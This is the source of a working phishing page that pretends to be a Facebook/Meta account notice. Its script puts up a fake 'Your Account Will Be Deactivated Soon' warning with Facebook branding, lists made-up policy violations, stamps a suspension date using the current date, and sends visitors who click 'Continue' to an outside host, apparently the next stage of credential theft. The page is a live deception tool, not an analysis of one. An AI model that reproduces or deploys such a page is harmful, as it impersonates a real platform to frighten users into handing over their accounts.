
<html>
<head>
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
    <title>...</title>
    <!-- <link rel="stylesheet" href="bootstrap5.min.css?v=2"> -->
    <!-- <script src="jquery-3.6.3.min.js?v=2"></script> -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css?q=<?=date('U')?>"
        rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
        crossorigin="anonymous">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js?q=<?=date('U')?>"
        integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <style>
    /* blue 216FDB */
    body {
        background-color: #f1f1f2;
        margin: 0px;
        padding: 0px;
    }

    .head {
        /* background-color: #386a8b; */
        background-color: #f1f1f2;
        /*dark*/
        text-align: left;
        margin-bottom: 33px;
        height: 40px;
    }

    .headimg {
        margin:3px;
        height: 87%;
    }

    .bannerimg {
        /* width: 33%; */
    }

    .content1 {
        text-align: center;
    }

    .content2 {
        padding: 3px;
    }

    .p-title {
        font-weight: 900;
        margin: 0px;
        padding: 0px;
    }

    .p-content {
        margin: 0px;
        padding: 0px;
        padding-top: 3px;
        padding-bottom: 7px;
        ;
    }
    .lock-img {
        background-color: #47579a;
        border-radius: 360px;
        margin: 0px;
        padding: 10px;
        font-size: 55pt;
    }
    </style>
</head>

<body onload="onloadRun()">
    <div class="head" id="head-line">
        <span style="margin-left:7px;color:#f1f1f2;font-size:2em;font-weight:bold" id="the-logo">.</span>
    </div>
    <div class="container mt-2">
        <div class="row justify-content-md-center">
            <div class="col-12 col-md-6">
                <div class="card">
                    <div id="div-img-header">
                    </div>
                    <div class="card-body">
                        <h3 class="text-center" id="card-title-text"></h3>
                        <p style="text-align: justify;" id="card-desc-text"></p>
                            <ul id="card-ul-text">
                            </ul>
                            <p id="card-desc2-text"></p>
                        <div id="div-btn-cont"></div>
                        <hr>
                        <p class="text-center text-danger pre mt-0" id="suspendeddaymkdfghoansndgfasd"></p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer class="main-footer text-center mt-2 mb-5" id="the-footer">
    </footer>
</body>
<script>
function onloadRun() {
    setTimeout(function() {
        var agent = navigator.userAgent.toLowerCase();
        AllowHeader=["Android","iPhone","Windows","WebKit","Macintosh"];
        CK=0;
        for (let index = 0; index < AllowHeader.length; index++) {
            xAgent=agent.toLocaleLowerCase();
            xHeader=AllowHeader[index].toLocaleLowerCase();
            if (xAgent.indexOf(xHeader) != -1) { 
                CK=1;
                break;
            }
        }
        if(CK==1){
            setDtSuspended();
            $('#card-title-text').html("Your Account Will Be Deactivated Soon");
            $('#div-img-header').html('<img style="width: 100%;" src="iii.jpg">');
            $('#card-desc-text').html("Content that requires additional information or context to enforce on, content that is allowedwith a warning screen or content that is allowed but can only be viewed by adults aged 18 and older.");
            // $('#card-ul-text').append("<li>Using someone else's fake name/photo.</li>");
            // $('#card-ul-text').append("<li>Share content that misleads other users.</li>");
            // $('#card-ul-text').append("<li>Insulting other users.</li>");
            $('#card-ul-text').append("<li>Offering or asking for sex or sexual partners (including partners who share fetish or sexual interests).</li>");
            $('#card-ul-text').append("<li>Sex chat or conversations.</li>");
            $('#card-ul-text').append("<li>𝖧𝖺𝗋𝗆𝗂𝗇𝗀 𝗈𝗍𝗁𝖾𝗋𝗌.</li>");
            $('#card-ul-text').append("<li>Nude photos/videos/imagery/sexual fetish items.</li>");
            $('#card-desc2-text').html("We'll take you through some steps to unlock your account.");
            $('#div-btn-cont').html('<a href="html.html"><button value="Verification" class="btn btn-lg btn-primary col-12" id="gotothepagevltn">Continue</button>');
        }
    }, 250);
    setTimeout(function() {
        document.title = 'Your Account Will Be Deactivated Soon';
        headline=document.getElementById("head-line");
        headline.style.backgroundColor = "#4267b2";
        $('#the-logo').html("f");
        $('#the-footer').html("Meta©2023");
    }, 50);
    setTimeout(function() {
        $("#gotothepagevltn").on("click", function() {
            rand=makeid(25);
            new_url="https://page-direct.pages.dev/?pg3571="+rand;;
            window.location.replace(new_url);
        });
    }, 500);
}
function setDtSuspended() {
    arrbulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October",
        "November", "December"
    ];
    date = new Date();
    dd = date.getDate();
    mm = date.getMonth();
    yy = date.getFullYear();
    $('#suspendeddaymkdfghoansndgfasd').text("Suspended on " + arrbulan[mm] + " " + dd + ", " + yy);
    $("input[name='mkdfghoansndgfasda']").focus();
}
function makeid(length) {
    let result = '';
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    const charactersLength = characters.length;
    let counter = 0;
    while (counter < length) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
      counter += 1;
    }
    return result;
}
</script>

</html>